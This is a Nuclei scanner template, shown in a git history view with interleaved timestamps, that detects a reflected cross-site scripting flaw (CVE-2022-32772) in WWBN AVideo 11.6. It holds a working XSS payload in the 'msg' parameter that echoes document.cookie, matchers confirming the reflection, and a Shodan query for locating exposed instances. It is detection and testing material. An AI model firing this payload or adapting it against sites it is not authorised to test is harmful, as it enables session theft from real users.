nuclei-templates/cves/2022/CVE-2022-32772.yaml

45 lines
1.3 KiB
YAML
Raw Normal View History

2022-08-28 07:51:09 +00:00
id: CVE-2022-32772
info:
name: WWBN AVideo 11.6 - Cross-Site Scripting
2022-08-28 07:51:09 +00:00
author: arafatansari
severity: medium
2022-08-28 07:51:09 +00:00
description: |
WWBN AVideo 11.6 contains a cross-site scripting vulnerability in the footer alerts functionality via the 'msg' parameter, which is inserted into the document with insufficient sanitization.
2022-08-28 07:51:09 +00:00
reference:
- https://talosintelligence.com/vulnerability_reports/TALOS-2022-1538
- https://github.com/WWBN/AVideo/blob/e04b1cd7062e16564157a82bae389eedd39fa088/updatedb/updateDb.v12.0.sql
- https://nvd.nist.gov/vuln/detail/CVE-2022-32772
2022-08-28 09:26:59 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-32772
cwe-id: CWE-79
2022-08-28 07:51:09 +00:00
metadata:
shodan-query: http.html:"AVideo"
verified: "true"
2022-08-29 16:41:43 +00:00
tags: cve,cve2022,avideo,xss,wwbn
2022-08-28 07:51:09 +00:00
requests:
2022-08-28 09:26:59 +00:00
- method: GET
path:
- "{{BaseURL}}/index.php?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"
2022-08-28 07:51:09 +00:00
matchers-condition: and
matchers:
2022-08-28 09:26:59 +00:00
- type: word
part: body
words:
- 'avideoAlertInfo("</script><script>alert(document.cookie);</script>'
2022-08-28 07:51:09 +00:00
- type: word
2022-08-28 09:26:59 +00:00
part: header
2022-08-28 07:51:09 +00:00
words:
2022-08-28 09:26:59 +00:00
- text/html
- type: status
status:
- 200
# Enhanced by mp on 2022/09/14